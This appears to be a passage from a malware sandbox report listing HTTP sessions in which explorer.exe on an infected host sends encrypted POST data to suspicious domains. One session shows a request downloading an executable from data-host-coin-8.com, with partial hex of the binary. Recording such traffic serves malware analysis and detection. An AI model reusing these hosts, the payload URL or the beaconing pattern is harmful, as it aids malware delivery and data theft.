request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
48	192.168.2.3	49862	175.126.109.15	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:48:44.949873924 CET	15272	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ynbdlhhsfj.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 263 Host: amogohuigotuli.at
Jan 9, 2022 18:48:44.949886084 CET	15272	OUT	Data Raw: 4a 9d 8d c5 4c 64 59 27 59 01 57 56 0f af 22 ba 2c 1b e9 1b f9 1e d7 dc b1 6a a3 80 75 83 a3 95 89 ab 8f c2 7c 44 e1 c5 a3 2e 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a2 19 be 8a 14 62 cd d6 4f 96 8a e3 11 d4 Data Ascii: JLdY'YWV",ju\|D.jp_S61oJf=B!bO0kOL8Ki&^yr>v#5Wi#]#_uvI2c@\hvIaNnRDQ%TX%*2NGW"swRzw
Jan 9, 2022 18:48:46.229041100 CET	15276	IN	HTTP/1.0 404 Not Found Date: Sun, 09 Jan 2022 17:48:45 GMT Server: Apache/2.4.6 (CentOS) PHP/5.6.40 X-Powered-By: PHP/5.6.40 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 f5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 3c eb e8 da 25 74 fe b3 89 24 05 7f 55 b7 d9 bc ce 25 6b 9d a5 89 34 b5 5d 91 f0 3e 7f 47 df 7c 6c 4a 1c 0a 91 6f bb 0b 09 5e 29 73 f6 45 bd b1 ab 52 54 30 c3 16 d1 67 97 a5 0c 92 74 ce 37 0c ac 7e 2b e9 6f 86 a1 1a d9 b3 29 14 5f 25 f5 9f bf 6c 13 d9 b4 52 b4 05 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 73 fb 42 15 9b 06 56 53 ba 16 40 fe 1d 09 52 2b e5 8d 83 7b 9e 45 f4 fe 73 8c 5c db c4 3d 18 13 bf c0 de 92 24 08 4f c5 5e b8 cb a1 61 6e de f5 69 f9 12 17 7e 5f ef 9a a5 54 c9 a0 c1 bb dd 7a 08 90 4e 19 e0 2c 95 a9 1d 1a f5 96 be 25 51 61 9a d4 75 7c 88 2c c8 48 99 67 cc 4a 98 03 fd 6d 9e aa 6b ac 87 3f bd 61 0d c0 4d bf 46 24 fd f8 12 6c 33 6c 39 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 97 d8 fe 1a 54 9b 4a d8 19 de 86 4f 83 f3 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 5f b4 e7 e7 6e 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac d7 bf d2 55 7d af ba 68 92 0e ff 9d 7f 7f 55 40 57 24 70 39 26 e6 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b af 1f ba f6 f6 01 e8 e4 cf 71 aa 90 4e b1 54 55 a5 be bc 1b 6f c7 cb 29 32 28 e7 5b 1e 54 ab 1e 26 7d 11 ee e3 ce 57 c3 62 6f e1 7e a0 3d 68 91 24 36 06 f1 2c 1e a5 03 5b c5 1f e4 a6 49 1b 9f 10 b9 d9 b0 99 07 99 8a cd e4 7f 74 39 50 6d 03 e2 dd ea ff 80 62 7a d7 00 79 fd e0 2b c9 bf bb 01 68 17 28 d2 fa 4d 1f d0 a1 aa 7a 8f f6 6b e3 cd d0 d9 37 40 80 e3 dc e7 57 9c 30 27 a6 5b fe 3f c9 e7 17 3f bc af 7e 4d a2 70 d4 03 8d a7 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 75 98 c3 e7 23 da b9 a6 3c 29 43 43 24 df 03 62 18 4a 57 f8 40 26 ae 88 c1 ae aa 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 cb 23 1e ec 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2 fe 92 c6 5a 6b 76 62 8c c9 69 c7 32 a7 90 4e b0 d4 08 d9 4e 2f 18 4b 74 f8 4f b5 24 74 05 f6 6c 1d bf 9d 69 13 23 92 37 88 32 78 7e 66 0b 1b b9 fb 35 51 ed 00 e4 26 0d 72 d7 a2 65 3f 3f 1c f9 e1 f7 66 08 60 f4 ce 89 ca 3b d4 85 08 c7 18 47 64 00 2d ed 07 fc ae 1c 0b 30 63 3d 32 6c 0f 73 f1 c7 00 c4 3d dd 12 e2 d8 28 32 72 91 59 03 d6 c9 f0 a8 8a 7a 2e d3 cd 8c 5f a9 85 10 70 8a a1 76 fe f3 57 a9 62 29 02 3d de b8 d4 5d 9a 44 9a 74 0f 46 24 37 b8 ec ee af 47 7f 04 cd f3 62 0b 42 97 90 17 a5 8c 4e 81 03 5a b5 00 a0 57 a1 ff 1b 5a 8f e0 e5 66 62 78 0e de 88 6b 17 ae 30 28 39 8a 53 eb 13 66 b5 29 1f 74 82 94 e7 98 6c b2 9f f0 75 6b cc 32 Data Ascii: `@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)\|p\|t]ShG<%t$U%k4]>G\|lJo^)sERT0gt7~+o)_%lR3Ob>!Z:V?sBVS@R+{Es\=$O^ani~_TzN,%Qau\|,HgJmk?aMF$l3l9\|~qTJOLuVW;r#u1y_n+Lc1<'i3FHU}hU@W$p9&(B@w=fd0QpKqNTUo)2([T&}Wbo~=h$6,[It9Pmbzy+h(Mzk7@W0'[??~Mpvn%.u#<)CC$bJW@&3%}/#wRLEsCRW!}B.'<BV`se%x`80_xm^22B9GQ =TZ\Z_i9*nX%Sr^3m~CvbE.`:2nJeig:X]y7gT$:jqw'eSUHc6Zkvbi2NN/KtO$tli#72x~f5Q&re??f`;Gd-0c=2ls=(2rYz._pvWb)=]DtF$7GbBNZWZfbxk0(9Sf)tluk2
Jan 9, 2022 18:48:46.229075909 CET	15278	IN	Data Raw: 69 eb d4 ea e0 02 6e 2f f7 8e d7 e8 dd a7 e3 1e 3c 9a 0f 14 78 02 cf 2f 0c 3a 03 2a fa 6e f1 8c b6 aa 5a 0d 9c b9 2d 56 4f d2 62 9a 62 58 41 3c 37 e1 00 bb 38 8e dd 5d 8b 86 7d 75 59 c9 32 80 18 86 2c 5a 26 3a 2a 20 4d e8 13 25 10 17 ef 36 54 d7 Data Ascii: in/<x/:nZ-VObbXA<78]}uY2,Z&: M%6TMemv8A=R;\|[:{jl#!85;^81Xom\|^q4LAE])5wH0vhfaL@90l)dJ'=_1RU#_X9
Jan 9, 2022 18:48:46.510409117 CET	15279	IN	Data Raw: 75 ae aa 2f 91 73 f2 a2 1f c8 1f 47 96 97 cc 82 50 11 ab 4e cc 17 4a e9 06 88 5c ec 57 21 3c 72 8d df 68 37 db 4c b1 2a f8 f0 f1 16 c1 b9 78 44 6d 62 9e 75 42 07 a2 1c bb 11 3f 16 43 a8 89 41 45 5f eb 29 0d 4a cd 2a 44 a4 25 c2 52 8c 91 b2 58 b9 Data Ascii: u/sGPNJ\W!<rh7LxDmbuB?CAE_)JD%RX@1$7SEw$ss2_ds5;DwL-a~<6c=Av2%ss=ks+7brqXlXAX1W+D{srGK]I3Brp`TM
Jan 9, 2022 18:48:46.510446072 CET	15281	IN	Data Raw: 27 69 aa f6 62 1f 1a b5 ee d1 55 0e e4 43 a6 22 10 57 38 28 35 a4 53 ef 42 e0 62 66 fc 7d ff 23 f8 2e 1b 08 09 17 23 9e be 18 93 15 cd f9 57 ec 00 23 35 43 e8 3b ae 2f c0 c7 85 28 45 55 b6 90 7a 61 4b 5b 9e 35 5c e7 5d f2 1c a8 b4 33 f4 4e 4a c4 Data Ascii: 'ibUC"W8(5SBbf}#.#W#5C;/(EUzaK[5\]3NJa 2cA=v"F.LAyUG/6t\|;Au7#rxDgLNR0hiEBdh6*{P>P'"`c.8C ^G"43
Jan 9, 2022 18:48:46.510533094 CET	15282	IN	Data Raw: 26 e4 36 e5 ce 86 27 50 53 21 1e 3e ef bc b7 9c 54 64 32 33 c3 40 67 44 b2 61 20 70 25 23 6f c5 78 21 75 2c 4c 30 c7 97 79 5b 05 ef ce b2 59 d5 e2 1e 49 01 a2 a5 65 61 8b e7 5e b3 c2 cb 56 3d 9a 6a 3a 98 24 a7 c1 6f fc b8 6f d3 86 2a 0e db 18 42 Data Ascii: &6'PS!>Td23@gDa p%#ox!u,L0y[YIea^V=j:$ooB_5=?mL5@$'5-{,--6<RC2~l T(Su\fzD1Z/eTJ'WQ{d0>t>S(6k0>#A#)#SV
Jan 9, 2022 18:48:46.510606050 CET	15283	IN	Data Raw: d9 df 35 35 15 46 9a 49 6b 4f 0e 3b e3 20 07 c2 1b ea 57 f9 a8 02 06 95 93 da 1d 3c 21 f3 e7 f4 0f 56 e3 5e fd fc da c3 98 0e 89 10 fe 62 d2 0d ae b8 1d 77 b2 55 d2 20 a7 2e 54 75 1c c1 e3 b3 1f 49 56 6c 3e 8a 16 51 17 1c f9 09 28 ac f3 ec e9 d5 Data Ascii: 55FIkO; W<!V^bwU .TuIVl>Q(BOOZ5!n%1f!9[@r+0uR3)nSl'$3A#Il{0=M=wI>NY_{f6/89p3;VoJ5dTs~/7
Jan 9, 2022 18:48:46.789395094 CET	15285	IN	Data Raw: 38 38 a6 87 18 aa da cd 1c dc d0 5b 2c 66 de 18 c6 a1 41 22 17 09 47 d0 92 10 5e 60 97 7f 98 38 9d 46 97 57 27 18 b7 23 39 04 8e bf 0f e1 10 59 09 0e e4 4f 92 4b 3d 3f f0 ad 8e 1a 8d 35 04 88 db 41 3f cb be 64 d3 85 9a a2 86 69 db 16 7a 49 21 60 Data Ascii: 88[,fA"G^`8FW'#9YOK=?5A?dizI!`Y<oS}[; #1M{Y]6/V=r0Tx_yiOFmWyvct 4Qg/!@JB-#z\|.}xif][)
Jan 9, 2022 18:48:46.789450884 CET	15287	IN	Data Raw: 47 db ab 1f 91 42 57 0e 4d 76 7e 0f b6 73 af 36 47 89 65 7c 26 a5 98 10 f9 54 c2 52 67 be ca d9 25 81 d8 30 db 11 2a fa d0 f7 6c f6 da 6f d1 39 86 10 77 bf 95 0e 78 71 f5 3c be 3b df d4 54 63 c6 84 62 8f d3 2b 34 c0 25 4d 79 89 70 72 e5 23 f8 1c Data Ascii: GBWMv~s6Ge\|&TRg%0*lo9wxq<;Tcb+4%Mypr#>zLlTF\w$BY'K!9Pz2w1W\$\|S2W["urC!RZi1N\IETrTB\CJ5/Ei\.3?<F3]t~zeEge7# -
Jan 9, 2022 18:48:46.789526939 CET	15288	IN	Data Raw: 2d 98 34 ae a4 69 98 77 60 c6 4f 9a a7 7a d3 93 f2 6b fa d3 ca 0e 21 be 78 b8 f8 1b 54 23 b8 ac 19 75 ba b8 41 46 16 e2 18 b4 14 e9 99 ed 53 06 b7 c8 8a 2e 3d 3e bc 69 66 25 dd 83 ac 18 85 46 29 e1 80 c5 37 68 b0 73 bc 1c 9c 76 87 7b ca fe dc 6e Data Ascii: -4iw`Ozk!xT#uAFS.=>if%F)7hsv{nx%i0@.TG^u!k?(AUuQaahr?@3P/glzfro>"y@8\|h[42}!smA39
Jan 9, 2022 18:48:46.789571047 CET	15289	IN	Data Raw: 6f 57 26 95 bb 37 0c 17 fb 00 24 b1 ee f1 a2 58 c8 39 2d 1d 1e d8 9d b4 be 68 1f 9b 13 d8 12 2b c4 91 24 f6 8b bb 63 0f 46 d3 b9 0c 18 c3 4d be f8 f3 ed a8 d8 19 e9 07 3c 33 d4 4d 37 d7 84 69 54 03 55 fb c3 61 c6 c5 b5 a2 41 00 95 1d 36 87 ba 62 Data Ascii: oW&7$X9-h+$cFM<3M7iTUaA6b`RK0jXYaPx+VW_ipD{Fo4TQql,$%h\_Oy?)4o0\|qb?F#M(_{Y8n<7OIx
Jan 9, 2022 18:48:46.790092945 CET	15291	IN	Data Raw: 72 2e f9 77 a4 e6 94 4e 35 86 a2 58 05 a5 3c 22 7b 66 fe 8a 28 32 f1 16 33 1b 36 7a ea e8 17 15 49 17 2a fc d5 dd 60 3d a5 42 c2 ff 89 b5 18 b9 98 45 15 71 b0 39 d4 82 ac 84 4c f3 44 6d 37 84 e1 33 75 38 0d 17 28 14 9c ac c9 f1 c8 8b 43 04 70 0b Data Ascii: r.wN5X<"{f(236zI*`=BEq9LDm73u8(CpB?ZH+\|&sI@A-7'.dw<0vV$du$dS(<9?VV$.q/vT\|!Y~#KUa/3-z[L

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
49	192.168.2.3	49863	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:48:45.353729963 CET	15273	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tlclh.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 177 Host: host-data-coin-11.com
Jan 9, 2022 18:48:45.353739023 CET	15273	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 84 de 87 66 5d 02 c9 a1 c1 64 33 a0 d7 74 Data Ascii: i;G~CE5i[nwmFu$f]d3t}1]DlJ_%/@:RS=F--1HE1hs$$Yme!*H(~/:o<
Jan 9, 2022 18:48:45.897263050 CET	15274	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:48:45 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49747	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:47:38.416515112 CET	1061	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gajno.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 124 Host: host-data-coin-11.com
Jan 9, 2022 18:47:38.416536093 CET	1061	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 9e 66 5d 02 c8 a1 c1 64 26 a9 8b 7e Data Ascii: i;G~CE5i[nwmFu$f]d&~I["qQ~]mB_=IZI"&
Jan 9, 2022 18:47:38.959603071 CET	1061	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:47:38 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
50	192.168.2.3	49864	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:48:46.118674040 CET	15275	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xpnufbkn.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 348 Host: host-data-coin-11.com
Jan 9, 2022 18:48:46.118771076 CET	15275	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 84 66 5d 02 c8 a1 c1 64 59 93 b0 00 Data Ascii: i;G~CE5i[nwmFu$f]dY$3>t/?XgVe:7x<De >f+ZosGNB[g#:%8lU6Mui4:dad#t?Oa4g_/bDy:KkGTWBU
Jan 9, 2022 18:48:46.676958084 CET	15284	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:48:46 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 4c ed ac 8c 70 bc 57 dd 43 d1 fc 2e 8d 25 ee c3 93 58 2a e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9LpWC.%X*c0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
51	192.168.2.3	49865	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:48:48.144927025 CET	15490	OUT	GET /files/2150_1641729871_1812.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: data-host-coin-8.com
Jan 9, 2022 18:48:48.689198971 CET	15628	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:48:48 GMT Content-Type: application/x-msdos-program Content-Length: 1670200 Connection: close Last-Modified: Sun, 09 Jan 2022 12:04:31 GMT ETag: "197c38-5d52505cea333" Accept-Ranges: bytes Data Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 13 aa cc 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 2e 01 00 00 84 0a 00 00 00 00 00 00 50 3a 00 00 10 00 00 00 40 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 3b 00 00 04 00 00 66 1c 1a 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 40 31 00 60 01 00 00 00 50 31 00 78 f8 08 00 00 00 00 00 00 00 00 00 70 63 19 00 c8 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 41 54 41 00 00 00 00 00 30 31 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 63 74 6f 72 73 00 00 00 10 00 00 00 40 31 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 f8 08 00 00 50 31 00 0c ed 03 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 65 78 74 00 00 00 00 a0 01 00 00 50 3a 00 0d 9e 01 00 00 f4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 aa 14 bb 41 81 e9 78 b2 8c 7b 7d b2 c4 17 98 83 e4 9a d2 ed f7 79 7b fc 71 78 d6 df b2 87 68 ae 00 ee cc 63 b8 8a 5a e9 fb 03 ec e1 e3 81 ee 5f 57 44 77 2e 0d 03 6c 40 31 00 00 00 00 00 00 00 00 00 a4 40 31 00 64 40 31 00 7c 40 31 00 00 00 00 00 00 00 00 00 cb 40 31 00 74 40 31 00 8c 40 31 00 00 00 00 00 00 00 00 Data Ascii: MZog':(332fC'B{b+Rd:QPELa.P:@@;f@@1`P1xpcDATA01`.ctors@1@.rsrcxP1@@.textP:@Ax{}y{qxhcZ_WDw.l@1@1d@1\|@1@1t@1@1
Jan 9, 2022 18:48:48.689255953 CET	15629	IN	Data Raw: 00 ee 40 31 00 84 40 31 00 9c 40 31 00 00 00 00 00 00 00 00 00 11 41 31 00 94 40 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b6 40 31 00 00 00 00 00 b6 40 31 00 00 00 00 00 db 40 31 00 00 00 00 00 db 40 31 00 00 00 00 00 00 Data Ascii: @1@1@1A1@1@1@1@1@1A1A1#A1#A1kernel32.dll\|GetModuleHandleAuser32.dllsCreateWindowExAadvapi32.dlltGetUserNameAcomctl32.dllC
Jan 9, 2022 18:48:48.689296007 CET	15631	IN	Data Raw: 03 00 00 ec 08 37 00 2a 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 09 04 00 00 98 03 00 00 c4 c4 36 00 28 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 09 04 00 00 c0 03 00 Data Ascii: 7h6(D\6hl5*hD5(D8l5(D
Jan 9, 2022 18:48:48.689333916 CET	15632	IN	Data Raw: ff 85 85 85 ff 99 99 99 ff ae ae ae ff c1 c1 c1 ff d1 d1 d1 ff df df df ff eb eb eb ff f4 f4 f4 ff fb fb fb ff ff ff ff fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: (8Y1( @ :::///GGG```yyy
Jan 9, 2022 18:48:48.689372063 CET	15633	IN	Data Raw: 0a 0a ff 09 09 09 ff 09 09 09 ff 0a 0a 0a ff 0d 0d 0d ff 0a 0a 0a ff 0a 0a 0a ff 0b 0b 0b ff 14 14 14 ff 1b 1b 1b ff 12 12 12 ff 15 15 15 ff 0c 0c 0c ff 10 10 10 ff 18 18 18 ff 0d 0d 0d ff 0f 0f 0f ff 10 10 10 ff 13 13 13 ff 12 12 11 ff 17 17 1b Data Ascii: '('0&%C!!( """&&%&&&**)
Jan 9, 2022 18:48:48.689412117 CET	15635	IN	Data Raw: ff 68 68 68 ff 52 52 52 ff 4e 4e 4e ff 5d 5d 5d ff 7f 7f 7f ff b6 b7 b7 ff c6 c6 c6 ff 4e 4e 4e ff 29 29 29 ff 2e 2e 2e ff 33 33 33 ff 33 33 33 ff 34 34 34 ff 35 35 35 ff 57 57 57 ff 56 56 56 ff 38 38 38 fb 1f 1f 1f ff 14 14 14 ff 14 14 14 ff 15 Data Ascii: hhhRRRNNN]]]NNN)))...333333444555WWWVVV888,,,wwwYYY===bbbuuunnnXXXzzzwww///111222444666777777777999;;;###!!$ &&&mmmkk
